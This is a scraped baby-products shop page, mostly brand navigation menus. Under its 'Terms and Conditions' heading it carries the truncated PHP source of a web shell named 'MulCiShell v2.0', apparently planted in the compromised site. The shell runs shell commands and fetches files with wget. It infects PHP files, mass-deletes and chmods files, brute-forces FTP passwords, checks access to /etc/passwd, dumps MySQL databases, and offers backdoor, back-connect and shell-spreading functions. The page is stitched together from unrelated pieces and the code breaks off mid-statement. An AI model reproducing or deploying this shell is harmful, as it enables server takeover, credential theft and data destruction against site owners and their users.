|
|
 |
|
| Baby Carrier |
|
|
|
|
|
Beco Baby |
|
|
|
|
|
|
|
|
|
Ergo baby |
|
|
|
|
|
|
|
|
|
Baby Bjorn |
|
|
|
|
|
|
|
|
|
Hotslings |
|
|
|
|
|
|
|
|
|
New Native Sling |
|
|
|
|
|
|
|
|
|
|
| Diper Bags |
|
|
| Cloth Diaper |
|
|
| Bebe Au Lait |
|
|
| Jamie rae hats |
|
|
| Kaiya Eve |
|
|
| Speesees |
|
|
| Blanket |
|
|
| Baby Stroller |
|
|
|
|
|
Inglesina |
|
|
|
|
|
|
|
|
|
Rock Star Baby |
|
|
|
|
|
|
|
|
|
Musty |
|
|
|
|
|
|
|
|
|
ICoo Targo |
|
|
|
|
|
|
|
|
|
Kolcraft |
|
|
|
|
|
|
|
|
|
|
| Kid's Healthy Care |
|
|
|
|
|
Herb For Kids |
|
|
|
|
|
|
|
|
|
Child Life |
|
|
|
|
|
|
|
|
|
Sambucol |
|
|
|
|
|
|
|
|
|
|
| Kitchen/Feeding |
|
|
|
|
|
Adiri |
|
|
|
|
|
|
|
|
|
Dexbaby |
|
|
|
|
|
|
|
|
|
Healty Baby |
|
|
|
|
|
|
|
|
|
Baby Bjorn |
|
|
|
|
|
|
|
|
|
Boon |
|
|
|
|
|
|
|
|
|
Munchkin |
|
|
|
|
|
|
|
|
|
Thermos(foogo) |
|
|
|
|
|
|
|
|
|
Thinkbaby |
|
|
|
|
|
|
|
|
|
Bornfree |
|
|
|
|
|
|
|
|
|
green to grow |
|
|
|
|
|
|
|
|
|
Kid Basix |
|
|
|
|
|
|
|
|
|
Lansinoh |
|
|
|
|
|
|
|
|
|
|
| Bath |
|
|
|
|
|
Dr. Bronner's |
|
|
|
|
|
|
|
|
|
Tummy Tub |
|
|
|
|
|
|
|
|
|
Baby Bjorn |
|
|
|
|
|
|
|
|
|
Boon |
|
|
|
|
|
|
|
|
|
Munchkin |
|
|
|
|
|
|
|
|
|
|
| Baby Care |
|
|
| Toy & Dolls |
|
|
|
|
|
Haba |
|
|
|
|
|
|
|
|
|
North American Bear |
|
|
|
|
|
|
|
|
|
Melisa & Doug |
|
|
|
|
|
|
|
|
|
Boon |
|
|
|
|
|
|
|
|
|
Munchkin |
|
|
|
|
|
|
|
|
|
|
| CD DVD BOOKS |
|
|
| LG Play Mat |
|
|
| Baby Skin Care |
|
|
|
|
|
|
|
|
|
|
|
|
 |
|
 |
|
 |
|
|
|
 |
>> Listed in category : HOME > Terms and Conditions |
|
|
array('pipe','r'),
1=>array('pipe','w')
);
$resource=@proc_open($cmd,$cmdpipe,$pipes);
if(@is_resource($resource))
{
while(@!feof($pipes[1]))
$ret.=@fgets($pipes[1]);
@fclose($pipes[1]);
@proc_close($resource);
return $ret;
}
return -1;
}
}
}
return -1;
}
$links=array("Enumerate"=>"$self?act=enum","Files"=>"$self?act=files","Domains"=>"$self?act=domains","MySQL"=>"$self?act=sql","Encoder"=>"$self?act=encode",
"Sec. Info"=>"$self?act=sec","Cracker"=>"$self?act=bf",
"Bypassers"=>"$self?act=bypass","Tools"=>"$self?act=tools","Databases"=>"$self?act=dbs","Backdoor Host"=>"$self?act=bh","Back Connect"=>"$self?act=backc","Spread Shell"=>"$self?act=spread","Kill Shell"=>"$self?act=kill");
echo "MulCiShell v2.0";
switch($_SESSION['theme'])
{
case 'green':
echo "
body{color:#66FF00; font-size: 12px; font-family: serif; background-color: black;}
td {border: 1px solid #00FF00; background-color:#001f00; padding: 2px; font-size: 12px; color: #33FF00;}
td:hover{background-color: black; color: #33FF00;}
input{background-color: black; color: #00FF00; border: 1px solid green;}
input:hover{background-color: #006600;}
textarea{background-color: black; color: #00FF00; border: 1px solid white;}
a {text-decoration: none; color: #66FF00; font-weight: bold;}
a:hover {color: #00FF00;}
select{background-color: black; color: #00FF00;}
#main{border-bottom: 1px solid #33FF00; padding: 5px; text-align: center;}
#main a{padding-right: 15px; color:#00CC00; font-size: 12px; font-family: arial; text-decoration: none; }
#main a:hover{color: #00FF00; text-decoration: underline;}
#bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;}
";
break;
case 'dark':
echo "
body{color: #FFFFFF; font-size: 12px; font-family: serif; background-color: #000000;}
td {border: 1px solid #FFFFFF; background-color: #000000; padding: 2px; font-size: 12px; color: #FFFFFF;}
input{background-color: black; color: #FFFFFF;; border: 1px solid #FFFFFF;}
input:hover{background-color: #000099;}
textarea{background-color: #000000; color: #FFFFFF; border: 1px solid white;}
a {text-decoration: none; color: #FFFFFF; font-weight: bold;}
a:hover {font-weight: bold;}
select{background-color: #000000; color: #FFFFFF;}
#main{border-bottom: 1px solid white; padding: 5px; text-align: center;}
#main a{padding-right: 15px; color:#FFFFFF; font-size: 12px; font-family: arial; text-decoration: none; }
#main a:hover{font-weight: bold;}
#bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;}
";
break;
default:
echo "
body{color: white; font-size: 12px; font-family: arial; scrollbar-base-color:blue; scrollbar-arrow-color:yellow; scrollbar-face-color:blue; }
td {border: 1px solid #000099; background-color: #000033; padding: 2px; font-size: 12px; color: white; }
input{background-color: black; color: white; border: 1px solid #000066;}
input:hover{background-color: #000066; border: 1px solid white;}
td:hover {color: yellow; background: black;}
textarea{background-color: #000033; color: white; border: 1px solid white;}
a {text-decoration: none; color: white; font-weight: bold;}
a:hover {color: yellow}
select{background-color: black; color: white;}
#main{border-bottom: 1px solid #0066FF; padding: 5px; text-align: center;}
#main a{padding-right: 15px; color: white; font-size: 12px; font-family: arial; text-decoration: none; }
#main a:hover{color: #0033FF; text-decoration: underline;}
#bar{width: 100%; position: fixed; background-color: black; bottom: 0; font-size: 10px; left: 0; border-top: 1px solid #FFFFFF; height: 12px; padding: 5px;}
";
break;
}
echo base64_decode("PGNlbnRlcjxpbWcgc3JjPSdodHRwOi8vaW1nNTI5LmltYWdlc2hhY2sudXMvaW1nNTI5LzExNjYv
bWlsY2lzaGVsbGxrNi5wbmcnPjwvY2VudGVyPg==");
echo "
Server IPYour IPDisk spaceSafe_mode?Open_BaseDir?SystemServer softwareDisabled functionsIDShell location
$serv$addr$space of $total$safe_mode$open_basedir$uname$soft$disable$idval".CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF'])."
";
foreach($links as $val=>$addr) echo "[ $val ]";
echo "";
if(isset($_POST['encryption']))
{
$e=$_POST['encrypt'];
echo "MD5: ".md5($e)."\nSHA1: ".sha1($e)."\nCrypt: ".crypt($e)."\nCRC32: ".crc32($e)."\nBase64 Encoded: ".base64_encode($e)."\nBase64 decoded: ".base64_decode($e)."\nURL encode: ".urlencode($e)."\nURL decode: ".urldecode($e)."\nBin2Hex ".bin2hex($e)."\nDec2Hex: ".dechex($e)."Input:
";
}
if(isset($_POST['dogetfile']))
execmd("wget $_POST[wgetfile]",$disable);
if(isset($_POST['doUpload']))
{
$dir=$_POST['u_location'];
$name=$_FILES['u_file']['name'];
switch($_FILES['u_file']['error'])
{
case 0:
if(@move_uploaded_file($_FILES['u_file']['tmp_name'],$dir.'/'.$name))
echo "File uploaded successfully";
else echo "Failed to upload file!";
}
}
if(isset($_POST['massfiles']))
{
$fail=0;
$success=0;
switch($_POST['fileaction'])
{
case 'Infect': #Nothing special here, just kick them while they're down
foreach($_POST['files'] as $file)
{
$ext=strrchr($file,'.');
if($ext!=".php") continue;
@$fh=fopen($file,'a');
if(@is_resource($fh))
{
$success++;
@fwrite($fh,"");
@fclose($fh);
} else $fail++;
}
echo "Successfully infected $success files; failed to infect $fail filesExploit files as such: file.php?e=php code";
break;
case 'Delete':
foreach($_POST['files'] as $file)
{
if(is_dir($file)) rm_rep($file,$success,$fail);
else
{
if(@unlink(CleanDir($file)))
{
echo "File $file deleted";
$success++;
}
else
{
echo "Failed to delete file $file";
$fail++;
}
}
}
echo "Total files deleted: $success; failed to delete $fail files";
break;
case 'Chmod':
foreach($_POST['files'] as $file)
{
if(is_dir($file)) chmod_rep($file,$success,$fail,$_POST['cmodv']);
if(@chmod(CleanDir($file),$_POST['cmodv']))
{
echo "Changed mode for $file";
$success++;
}
else
{
echo "Failed to change mode for $file";
$fail++;
}
}
echo "Total files modes modified: $success; failed to chmod $fail files";
break;
}
}
if(isset($_POST['docrack']))
{
$con=true;
$show=0;
$list=@fopen($_FILES['wordlist']['tmp_name'],'r');
if(is_resource($list))
{
if(isset($_POST['ftpcrack']))
{
echo "Bruting $_POST[ftp_user]@$_POST[ftp_host]...";
if(!empty($_POST['ftp_port'])) $port=$_POST['ftp_port'];
else $port='3306';
if(empty($_POST['ftp_timeout'])||!preg_match("/^[0-9]$/",$_POST['ftp_timeout']))
$time=3;
else $time=$_POST['ftp_timeout'];
@$ftp=ftp_connect($_POST['ftp_host'],$port,$time);
if(!$ftp) $con=false;
if($con)
{
$show++;
while(!feof($list))
{
@$pass=fgets($list);
if(ftp_login($ftp,$_POST['ftp_user'],trim($pass)))
{
echo "Password found! Password for $_POST[ftp_user] is $pass";
@ftp_close($ftp);
break;
}
if($show==10000){echo "Trying pass $pass..."; $show=0;}
}
} else echo "Failed to connect!";
}
elseif(isset($_POST['remote_login']))
{
//if(!function_exists("jitghjytiojho")) die("cURL support has to be enabled.");
/*
$ch=curl_init($_POST['remote_login_target']);
curl_setopt($ch,CURLOPT_HEADER,0);
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,'');
curl_exec($ch);
*/
if(preg_match("/^http:\/\/+/",$_POST['remote_login_target'])) die("Do not include http:// in the target URL.");
$path=explode('/',$_POST['remote_login_target']);
$site=$path[0];
for($i=1;$i0)?"Spread complete. Successfully managed to spread the shell $s times":"Failed to spread the shell.";
}
break;
case 'domains':
$header="GET /search/reverse-ip-domain.php?q=$_SERVER[HTTP_HOST] HTTP/1.0\r\n";
$header.="Host: searchy.protecus.de\r\n";
$header.="Connection: Close\r\n\r\n";
$domain_handle=fsockopen("searchy.protecus.de",80);
@fputs($domain_handle,$header,strlen($header));
while(@!feof($domain_handle))
{
echo fgets($domain_handle);
}
break;
case 'kill':
if(!isset($_POST['justkill']))
{
echo "Do you *really* want to kill the shell?
";
} else {
if(@unlink(basename($_SERVER['PHP_SELF']))) echo "Shell deleted.";
else echo "Failed to delete shell";
}
break;
case 'sec':
$mysql_on=function_exists("mysql_connect")?"ON":"OFF";
$curl_on=function_exists("curl_init")?"ON":"OFF";
$magic_quotes_on=get_magic_quotes_gpc()?"ON":"OFF";
$register_globals_on=(@ini_get('register_globals')=='')?"OFF":"ON";
$include_on=(@ini_get('allow_url_include')=='')?"Disabled":"Enabled";
$etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
$ver=phpversion();
echo "Security overviewPHP VersionSafe modeOpen_BasedirMagic_QuotesRegister globals
Remote includesRead /etc/passwd?MySQLcURL
$ver$safe_mode$open_basedir$magic_quotes_on$register_globals_on$include_on
$etc_passwd$mysql_on$curl_on
";
"";
break;
case 'enum':
$windows=0;
$path=CleanDir(getcwd());
if(!eregi("Linux",php_uname())) {$windows=1;}
if(!$windows)
{
$spath=str_replace("/home/","$serv/~",$path);
$spath=str_replace("/public_html/","/",$spath);
$URL="http://$spath/".basename($_SERVER['PHP_SELF']);
echo "Enumerated shell link: $URL";
} else echo "Enumeration failed";
break;
}
echo "";
if(isset($_POST['sqlquery']))
{
extract($_SESSION);
$conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
if($conn)
{
if(isset($_POST['db'])) @mysql_select_db($_POST['db']);
$post_query=@mysql_query(stripslashes($_POST['sqlquery'])) or die(mysql_error());
$affected=@mysql_num_rows($post_query);
echo "Affected rows: $affected";
}
}
$dirs=array();
$files=array();
if(!isset($_GET['d'])) {$d=CleanDir(realpath(getcwd())); $dh=@opendir(".") or die("Permission denied!");}
else {$d=CleanDir($_GET['d']); $dh=@opendir($_GET['d']) or die("Permission denied!");}
$current=explode("/",$d);
echo "Current location: ";for($p=0;$p$v)
if(in_array($k,$keys)) $values[]=$v;
$query="UPDATE $_GET[db].$_GET[tbl] SET ";
for($y=0;$y0)
echo "Previous";
if(mysql_num_rows($selector)>249)
echo "Next";
}
else echo "Next";
echo "";
}
else
{
$_SESSION=array();
session_destroy();
header("Location: $self?act=sql");
}
}
}
function SQLDownload()
{
extract($_SESSION);
$conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
if($conn)
{
if(isset($_GET['db'])&&!isset($_GET['tbl']))
{
$tables=array();
$dump_file="##################SQL Database dump####################\n";
$dump_file.="######################Dumped by: MulciShell v0.2#####################\n\n";
$get_tables=mysql_query("SHOW TABLES FROM $_GET[db]");
while($current_table=mysql_fetch_array($get_tables))
$tables[]=$current_table[0];
foreach($tables as $table_dump)
{
$data_selection=mysql_query("SELECT * FROM $_GET[db].$table_dump");
while($current_data=mysql_fetch_assoc($data_selection))
{
$fields=implode("`, `", array_keys($current_data));
$values=implode("`, `",array_values($current_data));
$dump_file.="INSERT INTO `$table_dump` ($fields) VALUES ($values); ";
}
}
} elseif(isset($_GET['db'])&&isset($_GET['tbl']))
{
$dump_file="##################SQL Database dump####################\n";
$dump_file.="######################Dumped by: MulciShell v0.2#####################\n";
$table_dump=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl]");
while($table_data=mysql_fetch_assoc($table_dump))
{
$fields=implode("`, `",array_keys($table_data));
$values=implode("`, `",array_values($table_data));
$dump_file.="INSERT INTO `$_GET[db].$_GET[tbl]` ($fields) VALUES ($values`)\n";
}
} else {
echo "Invalid!";
}
}
$dump_file.="########################################################################################";
if(!isset($_GET['tbl']))
$file_name="$_GET[db]"."_DUMP.sql";
else $file_name="$_GET[db]"."_$_GET[tbl]"."_DUMP.sql";
ob_get_clean();
header("Content-type: application/octet-stream");
header("Content-length: ".strlen($dump_file));
header("Content-disposition: attachment; filename=$file_name;");
echo $dump_file;
exit;
}
function SqlInsert()
{
extract($_SESSION);
$conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
if($conn)
{
if(!isset($_POST['sql_insert']))
{
echo "";
$sql_fields=array();
$fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]");
while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field'];
for($s=0;$s$v)
{
if(in_array($k,$sql_fields)&&!empty($v))
{
$values[]=$v;
$keys[]=$k;
}
}
for($k=0;$k
|
|
|
|
|
|
